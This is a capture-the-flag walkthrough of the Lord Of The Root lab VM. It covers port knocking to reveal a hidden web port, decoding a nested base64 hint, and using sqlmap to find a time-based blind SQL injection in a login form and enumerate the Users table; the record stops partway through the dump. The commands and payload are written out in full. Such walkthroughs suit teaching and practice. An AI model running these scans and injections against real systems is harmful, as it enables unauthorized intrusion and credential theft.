[Lab walkthrough] 6 - Lord Of The Root 1.0.1
2023-06-11 00:00:30 Author: 白帽子

Host discovery

The VM sits on the VMware NAT network, which has only a handful of hosts, so the target is easy to pick out: .1, .2 and .254 are VMware's own addresses (host adapter, NAT gateway, DHCP server), 192.168.116.164 is the attacking box, and 192.168.116.196 (a 00:0C:29 VMware guest) is the target.

└─# nmap -sP 192.168.116.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 22:40 CST
Nmap scan report for 192.168.116.1
Host is up (0.00016s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.116.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:E7:AD:8A (VMware)
Nmap scan report for 192.168.116.196
Host is up (0.000097s latency).
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Nmap scan report for 192.168.116.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F0:C3:61 (VMware)
Nmap scan report for 192.168.116.164
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.98 seconds

Port scan

Only one port, 22, is open. That was deflating; I even started thinking about brute force, but SSH on this box also locks you out: after enough failed attempts the connection is refused, so that did not seem realistic either.

└─# nmap -sVC -T5 -Pn -p- -O -open --min-rate 5000 192.168.116.196    

Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 22:41 CST
Nmap scan report for 192.168.116.196
Host is up (0.00036s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.96 seconds


First attempt

Without a username all I can do is check whether the service accepts a connection at all, so I connect as root (ssh uses the local user name when none is given, and the Kali shell is root).

└─# ssh 192.168.116.196              
The authenticity of host '192.168.116.196 (192.168.116.196)' can't be established.
ED25519 key fingerprint is SHA256:Rz24fg01xp2jMdwk9c44ijnZAz1uaUlvRXX7QU+ERtI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.116.196' (ED25519) to the list of known hosts.

[ASCII-art SSH banner; the spacing was lost in extraction. The first block reads "LOTR", the second "Knock Friend To Enter".]
Easy as 1,2,3
root@192.168.116.196's password:

After connecting I was stuck for a while: I could not read the art, and "Easy as 1,2,3" meant nothing to me. Some reading turned up a technique that was new to me: port knocking.


Port knocking

Port knocking is a way to open, from the outside, a port that is normally closed, by making a series of connection attempts. Once the firewall (or rather a daemon watching the traffic, such as knockd) sees connection attempts on the right ports in the right order, it dynamically opens a specific port for the host that sent them.

The main purpose is to stop attackers from finding services by port scanning: a scan sees nothing but filtered ports until the sequence has been sent. The knock works like a secret handshake. In its simplest form the client sends TCP or UDP packets to a fixed sequence of ports; the daemon on the host captures them, and if the sequence is correct it opens the corresponding port or adds a firewall rule admitting that client.

On Linux this is usually implemented with knockd plus iptables: the daemon sniffs the interface, tracks each source IP's progress through the sequence, and on completion runs a command that inserts an accept rule for that IP (normally removed again after a timeout). Two caveats worth keeping in mind: the sequence travels in the clear, so anyone who can sniff the path can replay it; and the daemon only needs to see the first packet (the SYN), so the attempts do not have to succeed. A tool that reports 100% packet loss has still knocked.

Reference: linux - 芝麻开门 Port-knocking (SegmentFault 思否 article, saved as PDF)


"Easy as 1,2,3" can only mean knocking on ports 1, 2 and 3, in that order. There are several ways to send the knocks.

nmap

for port in $(seq 1 3 ) ; do nmap 192.168.116.196 -p $port & done
└─# for port in $(seq 1 3 ) ; do nmap 192.168.116.196 -p $port & done
[2] 97590
[3] 97591
[4] 97592

A new port, 1337, now shows up (nmap1 below is presumably a shell alias for the full -sVC -p- scan used earlier; the output format is the same). Note that the & in the loop backgrounds each nmap, so the three probes leave in whatever order the processes happen to be scheduled; it worked here, but dropping the & makes the order deterministic.

└─# nmap1 192.168.116.196                                            
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 17:42 CST
Nmap scan report for 192.168.116.196
Host is up (0.00045s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.05 seconds


knock

sudo apt install knockd
  • knock <IP> <PORT1> <PORT2> <PORT3> <PORT4> -v

└─# knock 192.168.116.196 1 2 3  -v
hitting tcp 192.168.116.196:1
hitting tcp 192.168.116.196:2
hitting tcp 192.168.116.196:3
└─# nmap1 192.168.116.196          
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 17:49 CST
Nmap scan report for 192.168.116.196
Host is up (0.00035s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
| 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
| 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
|_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519)
1337/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:B8:FA:E3 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.09 seconds


hping3

  • -S (--syn): set the SYN flag. SYN is the first packet of the TCP handshake: the client sends SYN, the server answers SYN-ACK, the client completes with ACK, and only then can data flow. A knock daemon counts the SYN, so this single packet is all that is needed.

  • -p (--destport): destination port (default 0); several ports can be given

  • -c (--count): number of packets to send

hping3 -S [IP地址] -p 1 -c 1
└─# hping3 -S 192.168.116.196 -p 1 -c 1
HPING 192.168.116.196 (eth0 192.168.116.196): S set, 40 headers + 0 data bytes

--- 192.168.116.196 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

┌──(root㉿Tom)-[~/桌面]
└─# hping3 -S 192.168.116.196 -p 2 -c 1
HPING 192.168.116.196 (eth0 192.168.116.196): S set, 40 headers + 0 data bytes

--- 192.168.116.196 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

┌──(root㉿Tom)-[~/桌面]
└─# hping3 -S 192.168.116.196 -p 3 -c 1
HPING 192.168.116.196 (eth0 192.168.116.196): S set, 40 headers + 0 data bytes

--- 192.168.116.196 hping statistic ---
1 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

for port in $(seq 1 3 ); do hping3 -S 192.168.116.196 -p $port -c 1 & done

The "100% packet loss" above is expected: the port is filtered, so nothing comes back, but the SYN has already reached the knock daemon. The backgrounded loop has the same ordering caveat as the nmap version; hping3 can also send the whole sequence from one process with -p ++1 -c 3, since the ++ prefix increments the destination port after every packet.
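Both sides of the exchange described above, as an added example that is not part of the original walkthrough: knock() sends the connection attempts strictly in order (a refused or timed-out connect is the normal result, since only the SYN matters), is_open() checks whether the hidden service answers afterwards, and KnockSequence is a simplified model of how knockd tracks one partial sequence per source IP with a seq_timeout. The model is an assumption: real knockd also evaluates TCP flags, one-time sequences and runs the iptables command that actually opens the port. All names and addresses here are this example's own.

```python
import socket


def knock(host, ports, timeout=0.3, connect=None):
    """Client side: one connection attempt per port, strictly in order.
    The daemon only needs to see the SYN, so failures are ignored. `connect`
    is injectable so the sequencing can be exercised without a network."""
    connect = connect or _tcp_syn
    for port in ports:
        connect(host, port, timeout)


def _tcp_syn(host, port, timeout):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))      # the SYN is what the daemon counts
    except OSError:
        pass                            # filtered/closed: expected
    finally:
        sock.close()


def is_open(host, port, timeout=1.0):
    """Did the hidden service (1337 on this box) appear after the knock?"""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


class KnockSequence:
    """Server side: simplified knockd sequence matching (assumption, see lead-in).
    Remembers, per source IP, how far it has got and when it started."""

    def __init__(self, sequence, seq_timeout=5.0):
        self.sequence = list(sequence)
        self.seq_timeout = seq_timeout
        self.progress = {}              # src -> (next index, time of first correct knock)
        self.opened = set()             # sources the door has been opened for

    def observe(self, src, port, now):
        idx, started = self.progress.get(src, (0, now))
        if idx and now - started > self.seq_timeout:
            idx = 0                     # too slow: the partial sequence is forgotten
        if port != self.sequence[idx]:
            idx = 0                     # wrong port: start again
        if port == self.sequence[idx]:  # a correct first knock still counts after a reset
            if idx == 0:
                started = now
            idx += 1
        if idx == len(self.sequence):
            self.opened.add(src)        # knockd would run its start_command here
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, started)
        return False


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.116.196"
    knock(target, [1, 2, 3])
    print("1337 open after knocking:", is_open(target, 1337))
```

The out-of-order case in the model is exactly what a backgrounded loop can produce: the daemon sees 2, 1, 3 and never opens the door, which is why a sequential client is the reliable form.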


Web testing

Paths

dirb turns up little: a listable /images/ directory, a 64-byte index.html and the usual 403 on /server-status.

└─# dirb http://192.168.116.196:1337/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Nov 13 17:58:11 2022
URL_BASE: http://192.168.116.196:1337/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.116.196:1337/ ----
==> DIRECTORY: http://192.168.116.196:1337/images/
+ http://192.168.116.196:1337/index.html (CODE:200|SIZE:64)
+ http://192.168.116.196:1337/server-status (CODE:403|SIZE:297)

---- Entering directory: http://192.168.116.196:1337/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Nov 13 17:58:16 2022
DOWNLOADED: 4612 - FOUND: 2

So look at the page itself for a hint (there is no robots.txt in the dirb output). The 64-byte index.html source holds what looks like base64 in an HTML comment; identify the encoding first rather than guessing.

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh>
</html>

hash-identifier does not place it: it matches on length alone (48 characters is the width of a 192-bit digest in hex) without checking the alphabet, so its Tiger/Haval guess is noise. Mixed-case letters and digits with no hex constraint point at base64. Decoding it gives another base64 blob followed by "Closer!"; decoding that yields a URL path.

┌──(root㉿Tom)-[~/桌面]
└─# hash-identifier THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh
(hash-identifier v1.2 banner, by Zion3R, www.Blackploit.com)
--------------------------------------------------

Possible Hashs:
[+] Tiger-192
[+] Haval-192

Least Possible Hashs:
[+] Tiger-192(HMAC)
[+] Haval-192(HMAC)
--------------------------------------------------
HASH: ^C

Bye!

┌──(root㉿Tom)-[~/桌面]
└─# echo 'THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh' | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
┌──(root㉿Tom)-[~/桌面]
└─# echo 'Lzk3ODM0NTIxMC9pbmRleC5waHA=' | base64 -d
/978345210/index.php
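Nested encodings like this come up often enough in CTF hints to be worth a small tool. The following is an added example, not code from the original post: peel_base64() strictly decodes one layer at a time and, when a layer is not base64 as a whole (here the inner blob has " Closer!" appended), falls back to the longest base64-looking token inside it instead of giving up. The names are this example's own; the input is the string from the page.

```python
import base64
import binascii
import re

# Candidate tokens: runs of base64 alphabet, optionally padded, tried longest-first.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def decode_layer(candidate):
    """Strict base64 decode of one string. Returns the text, or None when the
    input is not valid base64 or does not decode to printable ASCII."""
    try:
        text = base64.b64decode(candidate, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def peel_base64(blob, max_depth=8):
    """Decode nested base64 layer by layer; returns every layer, outermost first.
    If a layer is not base64 as a whole, the longest base64-looking token inside
    it is tried, so trailing text such as 'Closer!' does not stop the peeling."""
    layers = [blob]
    current = blob.strip()
    for _ in range(max_depth):
        decoded = decode_layer(current)
        if decoded is None:
            for token in sorted(B64_TOKEN.findall(current), key=len, reverse=True):
                decoded = decode_layer(token)
                if decoded is not None:
                    break
        if decoded is None:
            break                       # nothing decodable left: this is the payload
        layers.append(decoded)
        current = decoded.strip()
    return layers


if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64("THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh")):
        print(f"layer {depth}: {layer}")
```

The printable-ASCII check is what stops the loop at "/978345210/index.php": the substring "/978345210/index" is valid base64 by alphabet and length, but decodes to bytes that are not text, so it is rejected rather than taken as a third layer.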


Injection

A login form with no other hints leaves two options, injection or brute force (pure fuzzing); no other web bug offers an obvious foothold, and for a less experienced tester this is the kind of place that turns into a rabbit hole.

I picked up a few extra sqlmap options from a colleague here:

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms --batch
  • Optimization

    • -o: turn on all of the optimization switches below

    • --predict-output: predict common query output

    • --keep-alive: use persistent HTTP(S) connections

    • --null-connection: retrieve page length without the actual HTTP response body

  • --threads=THREADS: number of concurrent requests

  • --forms: sqlmap fetches the page at the -u URL and tests the forms it finds

└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms --batch
(sqlmap 1.6.4#stable banner, https://sqlmap.org)

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:12:23 /2022-11-13/

[18:12:23] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=9e9m2i8ms1o...c2pk8sr9i4'). Do you want to use those [Y/n] Y
[18:12:23] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[18:12:24] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_0612pm.csv' as the CSV results file in multiple targets mode
[18:12:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[18:12:24] [INFO] testing if the target URL content is stable
[18:12:24] [INFO] target URL content is stable
[18:12:24] [INFO] testing if POST parameter 'username' is dynamic
[18:12:24] [WARNING] POST parameter 'username' does not appear to be dynamic
[18:12:24] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[18:12:24] [INFO] testing for SQL injection on POST parameter 'username'
[18:12:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:24] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:12:24] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:12:24] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:12:24] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:12:24] [INFO] testing 'Generic inline queries'
[18:12:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:12:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:12:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:12:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:12:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[18:12:24] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[18:12:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:12:25] [WARNING] POST parameter 'username' does not seem to be injectable
[18:12:25] [INFO] testing if POST parameter 'password' is dynamic
[18:12:25] [WARNING] POST parameter 'password' does not appear to be dynamic
[18:12:25] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[18:12:25] [INFO] testing for SQL injection on POST parameter 'password'
[18:12:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:12:25] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[18:12:25] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:12:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:12:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[18:12:25] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:12:25] [INFO] testing 'Generic inline queries'
[18:12:25] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:12:25] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:12:25] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:12:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:12:35] [INFO] POST parameter 'password' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[18:12:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:12:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:12:35] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 126 HTTP(s) requests:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[18:12:50] [INFO] the back-end DBMS is MySQL
[18:12:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[18:12:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_0612pm.csv'
[18:12:50] [WARNING] your sqlmap version is outdated

[*] ending @ 18:12:50 /2022-11-13/

With an injection point confirmed the rest is mechanical. sqlmap reuses the injection from its session file on every later run, so discovery is not repeated. The database name Webapp is not enumerated in the output shown; --current-db or --dbs is what produces it.

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp --tables --batch

Enumerate tables

└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp --tables --batch
(sqlmap 1.6.4#stable banner, https://sqlmap.org)

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:00:53 /2022-11-13/

[22:00:53] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=v4hcu00gj4d...k60g84vbn7'). Do you want to use those [Y/n] Y
[22:00:53] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[22:00:53] [INFO] resuming back-end DBMS 'mysql'
[22:00:53] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_1000pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[22:00:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:00:53] [INFO] fetching tables for database: 'Webapp'
[22:00:53] [INFO] fetching number of tables for database 'Webapp'
[22:00:53] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:00:53] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[22:00:58] [INFO] retrieved:
[22:01:08] [INFO] adjusting time delay to 1 second due to good response times
Users
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

[22:01:21] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_1000pm.csv'
[22:01:21] [WARNING] your sqlmap version is outdated

[*] ending @ 22:01:21 /2022-11-13/

Enumerate columns

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns --batch
└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns --batch
(sqlmap 1.6.4#stable banner, https://sqlmap.org)

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:07:08 /2022-11-13/

[22:07:08] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=dfoq1ga9bah...9s0up02g06'). Do you want to use those [Y/n] Y
[22:07:08] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[22:07:08] [INFO] resuming back-end DBMS 'mysql'
[22:07:08] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_1007pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[22:07:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[22:07:08] [INFO] fetching columns for table 'Users' in database 'Webapp'
[22:07:08] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[22:07:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:07:23] [INFO] adjusting time delay to 1 second due to good response times
3
[22:07:23] [INFO] retrieved: id
[22:07:30] [INFO] retrieved: int(10)
[22:07:54] [INFO] retrieved: username
[22:08:16] [INFO] retrieved: varchar(255)
[22:08:53] [INFO] retrieved: password
[22:09:20] [INFO] retrieved: varchar(255)
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(10) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

[22:09:56] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-11132022_1007pm.csv'
[22:09:56] [WARNING] your sqlmap version is outdated

[*] ending @ 22:09:56 /2022-11-13/

Dump the rows. I used --dump-all here, which dumps all tables rather than just the one named with -T (the log below shows it re-enumerating the Webapp tables); with -D/-T/-C given, plain --dump is the targeted switch. Either way the rows are written to a CSV under sqlmap's output directory.

sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump-all --batch
└─# sqlmap -o -u "http://192.168.116.196:1337/978345210/index.php" --forms -D Webapp -T Users --columns -C id,username,password --dump-all --batch
(sqlmap 1.6.4#stable banner, https://sqlmap.org)

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 22:16:59 /2022-11-13/

[22:16:59] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=puu8r112ftn...2e5lqhv9g0'). Do you want to use those [Y/n] Y
[22:16:59] [INFO] searching for forms
[1/1] Form:
POST http://192.168.116.196:1337/978345210/index.php
POST data: username=&password=&submit=%20Login%20
do you want to test this form? [Y/n/q]
> Y
Edit POST data [default: username=&password=&submit=%20Login%20] (Warning: blank fields detected): username=&password=&submit= Login
do you want to fill blank fields with random values? [Y/n] Y
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[22:17:00] [INFO] resuming back-end DBMS 'mysql'
[22:17:00] [INFO] using '/root/.local/share/sqlmap/output/results-11132022_1017pm.csv' as the CSV results file in multiple targets mode
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: password (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=gorg&password=' AND (SELECT 3792 FROM (SELECT(SLEEP(5)))oZLa) AND 'ksOe'='ksOe&submit= Login
---
do you want to exploit this SQL injection? [Y/n] Y
[22:17:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
